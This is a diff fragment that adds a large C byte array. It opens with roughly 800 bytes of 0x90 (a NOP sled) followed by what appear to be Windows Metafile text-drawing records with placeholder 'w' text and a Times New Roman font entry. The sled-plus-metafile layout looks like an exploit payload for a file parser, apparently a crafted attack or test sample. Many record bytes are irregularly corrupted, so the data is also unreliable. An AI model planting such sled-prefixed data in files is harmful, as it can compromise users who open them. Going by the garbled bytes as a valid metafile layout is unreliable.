+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00,
+	0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
+	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01,
+	0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
+	0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00,
+	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00,
+	0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00,
+	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
+	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
+	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
+	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
+	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
+	0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
+	0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20,
+	0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00,
+	0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
+	0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00,
+	0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00,
+	0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 0x49, 0x00, 0x07, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F,
+	0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00,
+	0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A,
+	0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00,
+	0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
+	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00,
+	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
+	0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
+	0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9,
+	0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
+	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11,
+	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00,
+	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00,
+	0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00,
+	0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20,
+	0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00,
+	0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00,
+	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00,
+	0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83,
+	0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
+	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02,
+	0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00,
+	0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
+	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
+	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00,
+	0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00,
+	0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0xEF, 0x00,
+	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
+	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00,
+	0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
+	0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00,
+	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00,
+	0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
+	0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00,
+	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
